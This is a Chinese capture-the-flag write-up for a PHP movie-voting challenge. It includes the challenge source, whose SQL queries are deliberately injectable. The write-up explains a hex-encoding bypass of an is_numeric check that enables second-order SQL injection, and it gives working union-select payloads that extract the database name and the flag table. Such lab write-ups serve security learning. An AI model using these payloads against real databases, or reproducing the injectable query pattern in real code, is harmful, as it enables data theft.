更新:
vote
<?php
include 'db.php';
session_start();
if (!isset($_SESSION['login'])) {
$_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
}
$login = $_SESSION['login'];
if (isset($_POST['submit'])) {
if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id']))
die('please select ...');
$id = $_POST['id'];
$vote = (int)$_POST['vote'];
if ($vote > 5 || $vote < 1)
$vote = 1;
$q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
$q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
echo '<p><b>Thank you!</b> Results:</p>';
echo '<table border="1">';
echo '<tr><th>Logo</th><th>Total votes</th><th>Average</th></tr>';
while ($r = mysql_fetch_array($q)) {
$arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
echo '<tr><td>'.$arr[0].'</td>';
$arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
echo '<td>'.$arr[0].'</td><td>'.round($arr[1],2).'</td></tr>';
}
echo '</table>';
echo '<br><a href="index.php">goBack</a><br>';
exit;
}
?>
<html>
<head>
<title>Movie vote</title>
</head>
<body>
<p>Welcome, Movie vote</p>
<form action="index.php" method="POST">
<table border="1" cellspacing="5">
<tr>
<?php
$q = mysql_query('SELECT * FROM t_picture');
while ($r = mysql_fetch_array($q)) {
echo '<td>![](./images/'.$r['image'].')<div align="center">'.$r['title'].'<br><input type="radio" name="id" value="'.$r['id'].'"></div></td>';
}
?>
</tr>
</table>
<p>Your vote:
<select name="vote">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select></p>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
分析
- 大致看下整体,发现是先insert再然后是查询
- 可控制的参数只有ID
- id的限制是is_numeric($_POST['id'])
解答
id的限制可以使用0x十六进制进行绕过,将我们的注入语句插入进去,存储在数据库中是以字符串的形式
payload如下:
id='-1' union select database()&vote=1&submit=Submit
进行十六进制编码后变成:
id=0x272d312720756e696f6e2073656c6563742064617461626173652829&vote=1&submit=Submit
结果:
最后得到flag的payload为:
id='-111' union select group_concat(flag) from t_flag&vote=1&submit=Submit
提交:
id=0x272d3131312720756e696f6e2073656c6563742067726f75705f636f6e63617428666c6167292066726f6d20745f666c6167&vote=1&submit=Submit